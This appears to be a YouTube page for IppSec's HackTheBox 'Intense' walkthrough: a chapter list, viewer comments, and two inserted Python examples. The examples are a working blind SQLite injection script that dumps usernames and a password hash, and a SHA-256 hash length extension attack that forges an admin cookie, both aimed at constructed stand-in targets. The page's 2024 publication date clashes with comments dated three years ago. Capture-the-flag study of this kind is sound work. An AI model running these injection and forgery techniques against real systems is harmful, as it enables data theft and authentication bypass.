
HackTheBox - Intense 

IppSec
241K subscribers
34K views

00:00 - Intro
01:15 - Begin of nmap
03:30 - Examining the Message, pointing out the endpoint does not need authentication
06:15 - Using FFUF to fuzz the API End Point and show importance of Content-Type
12:00 - Starting SQLMAP then manually fuzzing this application
14:30 - SQLite Boolean Injection, with CASE IF/THEN/ERROR
20:00 - SQLite Boolean Injection, Enumerating Usernames
24:00 - SQLite Boolean Injection, Start of Dumping Password
26:10 - SQLite Boolean Injection, Optimization chat about UNICODE and SUBSTR
29:40 - Start of coding out python script to dump the hash
41:20 - This hash looks weird... Tons of troubleshooting
45:12 - Explaining the issue, we are hitting the 140 character limit... Switching script up to do SUBSTR
51:55 - Script completed to dump hashes.
53:15 - Static source code analysis, find it is vulnerable to a Hash Length Extension Attack
59:50 - Using HashPumpy to perform the Hash Length Extension Attack
1:11:30 - We base64'd the signing portion wrong
1:13:30 - Now we have access to /admin, can use its API to read files and directories, showing sched_debug and /proc/net/tcp, udp, environ to get important information
1:23:30 - Finding a RW SNMP Community string and then using snmp-shell to get code execution
1:29:00 - Generating an SSH Key then copying it slowly to the box
1:35:00 - Doing a Local Port Forward with the Debian-SNMP User
1:37:20 - Binary Exploitation with Note_Server: Going over Source and recompiling with the -ggdb flag
1:41:00 - Binary Exploitation: Setting up PwnTools so we can interact with the binary
1:46:40 - Binary Exploitation: Defeating ASLR by leaking an address
1:56:20 - Binary Exploitation: Leaking LibC and Getting Code Execution
2:05:30 - Binary Exploitation: Creating offsets for our remote server to get it working
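The SQLite boolean-blind extraction that the 14:30 to 51:55 chapters walk through (an error-raising CASE as the true/false oracle, unicode()/substr() to pull one character per request, and the input length limit that forces the payload to stay short), written out as an added example. This is not IppSec's script or the box's real code: the message endpoint, the users/messages schema, the admin hash and the 140-character cap are constructed stand-ins, and the per-character binary search is the optimization discussed in the comments rather than what the video types out. The ELSE branch uses abs(-9223372036854775807-1), which SQLite only evaluates (and only then raises "integer overflow") when the WHEN condition is false, so a query error means "false" and a clean response means "true".

```python
"""Boolean-blind SQLite extraction through an error-raising CASE.
Added example; the endpoint, schema, hash and limit are constructed."""
import sqlite3

MAX_TITLE_LEN = 140  # assumed input limit, mirroring the 45:12 chapter


def make_vulnerable_app():
    """Constructed stand-in for the message endpoint: the title goes straight
    into the query and the caller only learns whether the query errored."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE users(username TEXT, secret TEXT);"
        "CREATE TABLE messages(title TEXT, content TEXT);"
        "INSERT INTO users VALUES('admin', '5f4dcc3b5aa765d61d8327deb882cf99');"  # constructed hash
        "INSERT INTO users VALUES('guest', 'nothing-to-see');"
        "INSERT INTO messages VALUES('hello', 'first post');"  # one row so WHERE is evaluated
    )

    def submit(title):
        if len(title) > MAX_TITLE_LEN:
            return "error: title too long"
        try:
            db.execute(f"SELECT title FROM messages WHERE title = '{title}'").fetchall()
            return "OK"
        except sqlite3.Error as exc:  # 'integer overflow' lands here
            return f"error: {exc}"

    return submit


class BlindExtractor:
    # Evaluated only when the WHEN condition is false; raises 'integer overflow'.
    ERR = "abs(-9223372036854775807-1)"

    def __init__(self, submit):
        self.submit = submit
        self.requests = 0

    def ask(self, cond):
        """One oracle query: True when cond holds (no error), False otherwise."""
        payload = f"x'OR(CASE WHEN({cond})THEN 1 ELSE {self.ERR} END)--"
        if len(payload) > MAX_TITLE_LEN:  # the limit bites before the server sees it
            raise ValueError(f"payload too long ({len(payload)} chars): {payload}")
        self.requests += 1
        return self.submit(payload) == "OK"

    def int_value(self, expr, lo=0, hi=127):
        """Binary-search an integer-valued SQL expression known to lie in [lo, hi]."""
        while lo < hi:
            mid = (lo + hi) // 2
            if self.ask(f"{expr}>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        return lo

    def string_value(self, subquery, max_len=255):
        """Recover a scalar string: its length first, then one character at a
        time via unicode(substr(...)) so every request stays short."""
        length = self.int_value(f"length(({subquery}))", 0, max_len)
        return "".join(
            chr(self.int_value(f"unicode(substr(({subquery}),{pos},1))"))
            for pos in range(1, length + 1)
        )


def dump_admin_hash():
    """Enumerate usernames (20:00), then dump the admin secret (24:00)."""
    ex = BlindExtractor(make_vulnerable_app())
    count = ex.int_value("(SELECT count(*) FROM users)", 0, 50)
    users = [ex.string_value(f"SELECT username FROM users LIMIT 1 OFFSET {i}") for i in range(count)]
    secret = ex.string_value("SELECT secret FROM users WHERE username='admin'", 64)
    return users, secret, ex.requests


if __name__ == "__main__":
    print(dump_admin_hash())
```

Each character costs seven requests for the 0..127 range instead of one request per candidate byte; the whole run above, two usernames plus a 32-character hash, lands in a few hundred requests. Against a real target, swap `make_vulnerable_app()` for a function that POSTs the title and returns the response body, and keep the length check, since a silently truncated payload looks exactly like a "false" answer.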
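The hash length extension from the 53:15 to 1:13:30 chapters, as an added example rather than the box's own code or HashPumpy. The page does not say which digest the app signs with, so SHA-256 (one of the algorithms HashPump handles), the cookie layout base64(data).base64(raw digest), the secret and the field contents are all assumptions made here. The unknown secret length is handled the way it has to be in practice, by forging one cookie per candidate length and letting the verifier pick the right one, and the new signature is encoded from raw digest bytes, which is the detail that went wrong at 1:11:30.

```python
"""SHA-256 length extension: forge sha256(secret||data||glue||extra) from
sha256(secret||data) without the secret.  Added example; the signing
scheme is a constructed stand-in and SHA-256 is assumed."""
import base64
import hashlib
import struct

# SHA-256 round constants (FIPS 180-4); the compression function is
# re-implemented so it can be resumed from a known digest.
_K = [
    0x428a2f98, 0x71374491, 0xb5c0fbcf, 0xe9b5dba5, 0x3956c25b, 0x59f111f1, 0x923f82a4, 0xab1c5ed5,
    0xd807aa98, 0x12835b01, 0x243185be, 0x550c7dc3, 0x72be5d74, 0x80deb1fe, 0x9bdc06a7, 0xc19bf174,
    0xe49b69c1, 0xefbe4786, 0x0fc19dc6, 0x240ca1cc, 0x2de92c6f, 0x4a7484aa, 0x5cb0a9dc, 0x76f988da,
    0x983e5152, 0xa831c66d, 0xb00327c8, 0xbf597fc7, 0xc6e00bf3, 0xd5a79147, 0x06ca6351, 0x14292967,
    0x27b70a85, 0x2e1b2138, 0x4d2c6dfc, 0x53380d13, 0x650a7354, 0x766a0abb, 0x81c2c92e, 0x92722c85,
    0xa2bfe8a1, 0xa81a664b, 0xc24b8b70, 0xc76c51a3, 0xd192e819, 0xd6990624, 0xf40e3585, 0x106aa070,
    0x19a4c116, 0x1e376c08, 0x2748774c, 0x34b0bcb5, 0x391c0cb3, 0x4ed8aa4a, 0x5b9cca4f, 0x682e6ff3,
    0x748f82ee, 0x78a5636f, 0x84c87814, 0x8cc70208, 0x90befffa, 0xa4506ceb, 0xbef9a3f7, 0xc67178f2,
]
_M32 = 0xFFFFFFFF


def _rotr(x, n):
    return ((x >> n) | (x << (32 - n))) & _M32


def _compress(state, block):
    """One SHA-256 compression of a 64-byte block into the 8-word state."""
    w = list(struct.unpack(">16L", block))
    for i in range(16, 64):
        s0 = _rotr(w[i - 15], 7) ^ _rotr(w[i - 15], 18) ^ (w[i - 15] >> 3)
        s1 = _rotr(w[i - 2], 17) ^ _rotr(w[i - 2], 19) ^ (w[i - 2] >> 10)
        w.append((w[i - 16] + s0 + w[i - 7] + s1) & _M32)
    a, b, c, d, e, f, g, h = state
    for i in range(64):
        t1 = (h + (_rotr(e, 6) ^ _rotr(e, 11) ^ _rotr(e, 25)) + ((e & f) ^ (~e & g)) + _K[i] + w[i]) & _M32
        t2 = ((_rotr(a, 2) ^ _rotr(a, 13) ^ _rotr(a, 22)) + ((a & b) ^ (a & c) ^ (b & c))) & _M32
        h, g, f, e, d, c, b, a = g, f, e, (d + t1) & _M32, c, b, a, (t1 + t2) & _M32
    return [(x + y) & _M32 for x, y in zip(state, (a, b, c, d, e, f, g, h))]


def _padding(total_len):
    """The padding SHA-256 appends to a message of total_len bytes."""
    return b"\x80" + b"\x00" * ((55 - total_len) % 64) + struct.pack(">Q", total_len * 8)


def length_extend(digest_hex, prefix_len, extra):
    """Given sha256(prefix) and len(prefix), return (suffix, new_hex) with
    sha256(prefix + suffix) == new_hex, where suffix = glue padding + extra."""
    state = list(struct.unpack(">8L", bytes.fromhex(digest_hex)))
    glue = _padding(prefix_len)  # the state after this glue is exactly the known digest
    tail = extra + _padding(prefix_len + len(glue) + len(extra))
    for off in range(0, len(tail), 64):
        state = _compress(state, tail[off:off + 64])
    return glue + extra, struct.pack(">8L", *state).hex()


# Constructed target: cookie = base64(data) "." base64(sha256(SECRET || data)).
SECRET = b"s3cr3t-server-key"  # unknown to the attacker, 17 bytes


def server_sign(data):
    sig = hashlib.sha256(SECRET + data).digest()
    return base64.b64encode(data).decode() + "." + base64.b64encode(sig).decode()


def server_verify(cookie):
    """Returns the signed data, or None if the MAC does not match."""
    data_b64, sig_b64 = cookie.split(".", 1)
    data = base64.b64decode(data_b64)
    if hashlib.sha256(SECRET + data).digest() != base64.b64decode(sig_b64):
        return None
    return data


def forge(cookie, extra, secret_len):
    """Extend a captured cookie with `extra`, assuming the secret is secret_len bytes."""
    data_b64, sig_b64 = cookie.split(".", 1)
    data = base64.b64decode(data_b64)
    suffix, new_hex = length_extend(base64.b64decode(sig_b64).hex(), secret_len + len(data), extra)
    # Encode the raw digest bytes, not the hex string (the 1:11:30 mistake).
    return base64.b64encode(data + suffix).decode() + "." + base64.b64encode(bytes.fromhex(new_hex)).decode()


def forge_admin(cookie, extra=b";role=admin", max_secret_len=64):
    """Secret length unknown: try each candidate until the server accepts one."""
    for n in range(1, max_secret_len + 1):
        candidate = forge(cookie, extra, n)
        if server_verify(candidate) is not None:
            return n, candidate
    return None


if __name__ == "__main__":
    print(forge_admin(server_sign(b"username=user")))
```

The forged data carries the glue bytes (0x80, zeros, original bit length) between the old and new fields, so this only works when the parser on the other side tolerates that junk or reads the last occurrence of a key; the defence is an HMAC, or any construction whose digest is not the raw internal state.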

Published: 3 Jul 2024

Comments: 52
@XArticSpartanX 3 years ago
Awesome vid, that buffer overflow working on first run was sick.
@Ms.Robot. 3 years ago
Your stroll to the SNMP string and rush of the buffer overflow was very charming and well explained. Loved it. 💝💝💝😍
@sreyanchakravarty7694 3 years ago
Never a dull moment with IppSec. Thank you so much for your videos.
@spent1276 3 years ago
IppSec drinking game: every time he says "Let's see..." take a drink.
@FuzzFuck 3 years ago
Or every time an ad plays, take a drink.
@noway5930 3 years ago
'if EXPR: return True; else: return False' is the same as 'return EXPR'. Great vid :D
@moblemeh152 3 years ago
Great video as always, thanks for the hard work!
@azelbane87 3 years ago
Absolutely AWESOME!! IppSec, WE Absolutely LOVE YOU & ur VIDEOS!!!👏👏👏✊👋
@haniagel3896 3 years ago
Oh, IppSec is here, this is going to be a great weekend 😍😍
@ASoggySandal 3 years ago
This was a great video and box!
@Seferan 3 years ago
5:36 - The difference when you're authenticated vs not authenticated is the menu option for Submit. It's exactly what you said previously, that the "Auth" only gives you the link/menu option.
@Xblade45 3 years ago
Great video, very enjoyable :) Also, JSON requires double quotes -> " :)
@ChrisSoehnlein 3 years ago
Awesome video! Started losing my way around the Buffer Overflow section. Would love a video explaining Buffer Overflows from your mindset and the tools you use. I've been learning via Immunity Debugger but still struggling, which really halted my progress on this box when it was active.
@loganmay2105 3 years ago
This was probably my favorite box, sad they retired it. Edit: 1:46:41 there is no ASLR on this binary. Edit 2: I want to point out you can run GDB commands through pwntools and automate all that manual work.
@cybersecurity3523 3 years ago
Welcome back, pro.
@goebbelsx 3 years ago
Can you make a video about 1-day exploit development? Or how to identify an already patched vulnerability. There are a few resources but not many, and I struggle to find a solid learning resource. I am sure you have some experience in it :)
@-zer122 3 years ago
Great video, as always! The exploitation part was a bit too fast, but maybe you have been planning extra videos showing more binary exploitation (entry level). Ffuf is kinda cool but not a finished tool like gobuster or wfuzz are. They made ffuf complex with 'filter' instead of 'hide' as in wfuzz, and moreover the export format doesn't have TXT. And if you set the -recurse option (dirb-like) the output is trash for the whole website targeted.
@exag0ra 3 years ago
@-zer122 Totally agreed on FFUF. I used to use it, but I much prefer wfuzz or gobuster to it. Have you tried FeroxBuster (github.com/epi052/feroxbuster)? I just started using that within the past 2 weeks or so and it's a really cool tool written in Rust. It's very fast compared to gobuster, FFUF, and Dirsearch, plus it does recursion by default extremely well.
@JoseGonzalezDynamEq 1 year ago
Respect😅👍
@j4ck_d4niels 3 years ago
Intense is a really hard box, I am stuck at the enumeration point and got lazy to step back and think again.
@jaybachre6976 3 years ago
What do the different values of levels and risks mean in sqlmap?
@michaelbann3485 3 years ago
Fun fact -- print in python3 takes an argument "flush" which does exactly the janky print/flush stuff you're doing but in a single kwarg. i.e.: print("Something", flush=True).
@Buiscit1738 3 years ago
Most underrated comment.
@3zehnutters 3 years ago
If you want to do flush printing in python3 without sys, then try the following syntax: print(f"prompt: {acc}", end=' ')
@DHIRAL2908 3 years ago
48:25 I just did it like %pw[:-5]% so it only checks the last 5 found chars with the forward one...
@amirkiani2253 3 years ago
Good, bro.
@shaikjilani8242 3 years ago
EXCELLENT BRO❤️❤️❤️❤️ LOVE FROM INDIA
@wchen2340 3 years ago
I can barely understand half of the stuff he does, but it's awesome.
@hassanabdul-kareem2287 3 years ago
Still at the scripting part: you should have used a binary tree to optimize it further and minimize the amount of requests you need. X > 100 = True, X = 200 = False, X = 200+100/2 -> X = 150 = False, X = 100+150/2 -> X = 125 = False ... until you achieve X is between 103/101, which is definitely 10, and so on. This would be super duper fast. I guess you didn't do it because that & what you did would do the same job and get it done :) This video energized me to do some SQL Injection labs, thanks man.
@ippsec 3 years ago
I'm pretty sure I explained that and showed extracting a single character as a unicode # to make that relatively easy... Just didn't show it because this is live coding and I don't do that nearly enough to write a decent algorithm or know what to google to get one done quickly. When doing pentests (or videos), there's an art to deciding whether doing this "the correct way" will take more time than if I just do it quickly and get the result. It's a bad habit but I feel if you always go for the best it will be hard to get everything else you want done.
@hassanabdul-kareem2287 3 years ago
@ippsec I totally agree on that point. Although I'd say that nobody would hate extra content, they can skip a part if they don't like it. In any case, I always watch your videos for the sole purpose of well built and demonstrated methodology.
@puppe1977 3 years ago
At 32:08, why not just 'return "OK" in r.text'?
@ristbs9057 3 years ago
How do you manage to know all this??? Did you learn by yourself?
@chrisrice8836 3 years ago
At the 45 min mark when trying to brute the hash and coming up against the character limit, couldn't you just take the second half of the hash and stick a % at the start? Like '%ddfd9 ) THEN...
@mehmetux4186 3 years ago
Does anyone recommend a good book or tutorial or any source about reverse engineering and stack overflow attacks / binary exploitation? (like The Web Application Hacker's Handbook)
@mehmetux4186 3 years ago
@hassanabdul-kareem2287 thank you very much, it is exactly what I was looking for.
@phyzix_phyzix 3 years ago
Burp Suite needs a dark mode.
@xXThePr0Xx 3 years ago
Wouldn't Log Poisoning be an option to get a shell with logdir and logfile?
@ippsec 3 years ago
No. There's no code execution in how they are doing file reads.
@xXThePr0Xx 3 years ago
@ippsec oh yeah, nvm then
@youtubepremium5293 3 years ago
I'm from India, today is Diwali bro, happy_diwali ❤️💥💥❤️
@Seferan 3 years ago
Timestamp for 12:00 should read SQLMap, not NMap
@ippsec 3 years ago
Thank you, fixed.
@glenrodrigues8149 3 years ago
I am new (noob) to this field, can anyone tell me how to reach this level?
@TheGrimSniper14 3 years ago
Years of practice. When you're getting into the nitty gritty, especially with things like binary exploitation, it can require a lot of background knowledge, so watching videos like this without knowing the background info is gonna be confusing because you don't have the context of why he's doing what he's doing and how he got to some decisions.
@samu5167 2 years ago
@CHICKEN-DESTROYER learn it yourself and find out ;)
@spoopymayers2224 3 years ago
Ay man, make the APT machine pls
@gtgt8564 3 years ago
2hrs????????
@kret63 3 years ago
Why spend 2h watching dumb movies when you can watch IppSec? :D
@comtuber6811 3 years ago
My man, love your videos, but you should write more code, man! Either you cannot code on the fly or you're not a good algorithm reader.
@ippsec 3 years ago
Not a great code writer, and it's doubly hard to talk and code simultaneously.
@comtuber6811 3 years ago
@ippsec understandable, keep up the good work!